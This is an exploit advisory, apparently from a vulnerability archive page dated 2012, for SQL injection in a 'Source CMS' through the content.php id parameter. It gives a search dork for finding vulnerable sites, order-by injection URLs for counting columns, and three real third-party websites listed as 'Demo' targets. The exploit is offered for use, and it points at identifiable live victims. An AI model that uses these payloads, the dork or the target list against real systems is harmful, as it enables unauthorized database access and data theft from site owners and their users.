Source CMS SQL Injection

2012.04.28
Credit: farbodmahini
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################################################################################## # # # Exploit Title : source CMS SQL Injection Vulnerability # # # # Author : Secure-Land Security Team # # # # Discovered By : farbodmahini # # # # Home : Secure-Land.net # # # # Vendor : www.source.com.hk # # # # Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com # # # # Security Risk : High # # # # DorK : "powered by the source" # # # # # ######################################################################################## # # # Expl0iT: # # # # http://[TarGeT]/content.php?id=[sqli] # # # # # # Test SQL Injection in MYSQL Version : # # # # # # False # # # # http://[TarGeT]/content.php?id=1+order+by+9-- # # # # True # # # # http://[TarGeT]/content.php?id=1+order+by+8-- # # # # Demo : # # # # http://www.mangano.ch/content.php?id=[sqli] # # http://www.cbline.ch/content.php?id=[sqli] # # http://www.vinsdemorges.ch/content.php?id=[sqli] # # # ######################################################################################## # # # Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us # # # ######################################################################################## # # # Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id # # # ########################################################################################

References:

http://www.source.com.hk/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top